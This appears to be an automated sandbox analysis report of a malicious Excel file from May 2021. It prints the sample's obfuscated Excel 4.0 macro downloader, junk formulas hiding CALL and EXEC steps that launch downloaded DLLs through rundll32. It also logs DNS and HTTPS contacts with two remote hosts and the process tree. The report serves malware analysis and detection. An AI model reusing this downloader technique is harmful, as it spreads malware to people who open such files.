                                                                  Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 05 76 69 2d 76 69 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                  Macro 4.0 Code

                                                                  CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)=RUN(Doc4!AM6)

                                                                  ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(""U""&before.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&""A"",before.3.5.0.she
                                                                  "=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&""1"",0,!AL21)=RUN(Doc4!AM6)"
                                                                  "=MDETERM(56241452475)=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=RUN(Doc3!AY22)"

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 12, 2021 20:52:34.700290918 CEST49165443192.168.2.22192.185.39.58
                                                                  May 12, 2021 20:52:34.859972000 CEST44349165192.185.39.58192.168.2.22
                                                                  May 12, 2021 20:52:34.860167980 CEST49165443192.168.2.22192.185.39.58
                                                                  May 12, 2021 20:52:34.875341892 CEST49165443192.168.2.22192.185.39.58
                                                                  May 12, 2021 20:52:35.034025908 CEST44349165192.185.39.58192.168.2.22
                                                                  May 12, 2021 20:52:35.047511101 CEST44349165192.185.39.58192.168.2.22
                                                                  May 12, 2021 20:52:35.047548056 CEST44349165192.185.39.58192.168.2.22
                                                                  May 12, 2021 20:52:35.047568083 CEST44349165192.185.39.58192.168.2.22
                                                                  May 12, 2021 20:52:35.047729969 CEST49165443192.168.2.22192.185.39.58
                                                                  May 12, 2021 20:52:35.093641043 CEST49165443192.168.2.22192.185.39.58
                                                                  May 12, 2021 20:52:35.261606932 CEST44349165192.185.39.58192.168.2.22
                                                                  May 12, 2021 20:52:35.261755943 CEST49165443192.168.2.22192.185.39.58
                                                                  May 12, 2021 20:52:36.869930983 CEST49165443192.168.2.22192.185.39.58
                                                                  May 12, 2021 20:52:37.070472956 CEST44349165192.185.39.58192.168.2.22
                                                                  May 12, 2021 20:52:37.201122999 CEST44349165192.185.39.58192.168.2.22
                                                                  May 12, 2021 20:52:37.201283932 CEST44349165192.185.39.58192.168.2.22
                                                                  May 12, 2021 20:52:37.201421976 CEST49165443192.168.2.22192.185.39.58
                                                                  May 12, 2021 20:52:37.201442957 CEST49165443192.168.2.22192.185.39.58
                                                                  May 12, 2021 20:52:37.202375889 CEST49165443192.168.2.22192.185.39.58
                                                                  May 12, 2021 20:52:37.279437065 CEST49168443192.168.2.22192.185.32.232
                                                                  May 12, 2021 20:52:37.362838984 CEST44349165192.185.39.58192.168.2.22
                                                                  May 12, 2021 20:52:37.441329956 CEST44349168192.185.32.232192.168.2.22
                                                                  May 12, 2021 20:52:37.441457987 CEST49168443192.168.2.22192.185.32.232
                                                                  May 12, 2021 20:52:37.442059994 CEST49168443192.168.2.22192.185.32.232
                                                                  May 12, 2021 20:52:37.606080055 CEST44349168192.185.32.232192.168.2.22
                                                                  May 12, 2021 20:52:37.619582891 CEST44349168192.185.32.232192.168.2.22
                                                                  May 12, 2021 20:52:37.619632006 CEST44349168192.185.32.232192.168.2.22
                                                                  May 12, 2021 20:52:37.619661093 CEST44349168192.185.32.232192.168.2.22
                                                                  May 12, 2021 20:52:37.619822025 CEST49168443192.168.2.22192.185.32.232
                                                                  May 12, 2021 20:52:37.665781975 CEST49168443192.168.2.22192.185.32.232
                                                                  May 12, 2021 20:52:37.839745045 CEST44349168192.185.32.232192.168.2.22
                                                                  May 12, 2021 20:52:37.839929104 CEST49168443192.168.2.22192.185.32.232
                                                                  May 12, 2021 20:52:37.879363060 CEST49168443192.168.2.22192.185.32.232
                                                                  May 12, 2021 20:52:38.081314087 CEST44349168192.185.32.232192.168.2.22
                                                                  May 12, 2021 20:52:38.444132090 CEST44349168192.185.32.232192.168.2.22
                                                                  May 12, 2021 20:52:38.444328070 CEST49168443192.168.2.22192.185.32.232
                                                                  May 12, 2021 20:52:38.445065975 CEST44349168192.185.32.232192.168.2.22
                                                                  May 12, 2021 20:52:38.445167065 CEST49168443192.168.2.22192.185.32.232
                                                                  May 12, 2021 20:53:08.445360899 CEST44349168192.185.32.232192.168.2.22

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 12, 2021 20:52:34.498296022 CEST5219753192.168.2.228.8.8.8
                                                                  May 12, 2021 20:52:34.683665037 CEST53521978.8.8.8192.168.2.22
                                                                  May 12, 2021 20:52:35.631356001 CEST5309953192.168.2.228.8.8.8
                                                                  May 12, 2021 20:52:35.681977034 CEST53530998.8.8.8192.168.2.22
                                                                  May 12, 2021 20:52:35.689065933 CEST5283853192.168.2.228.8.8.8
                                                                  May 12, 2021 20:52:35.737957001 CEST53528388.8.8.8192.168.2.22
                                                                  May 12, 2021 20:52:36.288023949 CEST6120053192.168.2.228.8.8.8
                                                                  May 12, 2021 20:52:36.345499992 CEST53612008.8.8.8192.168.2.22
                                                                  May 12, 2021 20:52:36.352636099 CEST4954853192.168.2.228.8.8.8
                                                                  May 12, 2021 20:52:36.404714108 CEST53495488.8.8.8192.168.2.22
                                                                  May 12, 2021 20:52:37.214313030 CEST5562753192.168.2.228.8.8.8
                                                                  May 12, 2021 20:52:37.276567936 CEST53556278.8.8.8192.168.2.22

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  May 12, 2021 20:52:34.498296022 CEST192.168.2.228.8.8.80xd372Standard query (0)signifysystem.comA (IP address)IN (0x0001)
                                                                  May 12, 2021 20:52:37.214313030 CEST192.168.2.228.8.8.80xd7b1Standard query (0)fcventasyservicios.clA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  May 12, 2021 20:52:34.683665037 CEST8.8.8.8192.168.2.220xd372No error (0)signifysystem.com192.185.39.58A (IP address)IN (0x0001)
                                                                  May 12, 2021 20:52:37.276567936 CEST8.8.8.8192.168.2.220xd7b1No error (0)fcventasyservicios.cl192.185.32.232A (IP address)IN (0x0001)

                                                                  HTTPS Packets

                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                  May 12, 2021 20:52:35.047568083 CEST192.185.39.58443192.168.2.2249165CN=cpcontacts.signifysystem.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Apr 01 17:00:25 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Wed Jun 30 17:00:25 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                  CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                  May 12, 2021 20:52:37.619661093 CEST192.185.32.232443192.168.2.2249168CN=mail.fcventasyservicios.cl CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Mar 16 13:01:12 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon Jun 14 14:01:12 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                  CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                  Code Manipulations

                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  Analysis Process: EXCEL.EXE PID: 2380 Parent PID: 584

                                                                  General

                                                                  Start time:20:52:37
                                                                  Start date:12/05/2021
                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                  Imagebase:0x13f160000
                                                                  File size:27641504 bytes
                                                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Analysis Process: rundll32.exe PID: 2648 Parent PID: 2380

                                                                  General

                                                                  Start time:20:52:44
                                                                  Start date:12/05/2021
                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:rundll32 ..\ritofm.cvm,DllRegisterServer
                                                                  Imagebase:0xff960000
                                                                  File size:45568 bytes
                                                                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Analysis Process: rundll32.exe PID: 2552 Parent PID: 2380

                                                                  General

                                                                  Start time:20:52:45
                                                                  Start date:12/05/2021
                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:rundll32 ..\ritofm.cvm1,DllRegisterServer
                                                                  Imagebase:0xff960000
                                                                  File size:45568 bytes
                                                                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >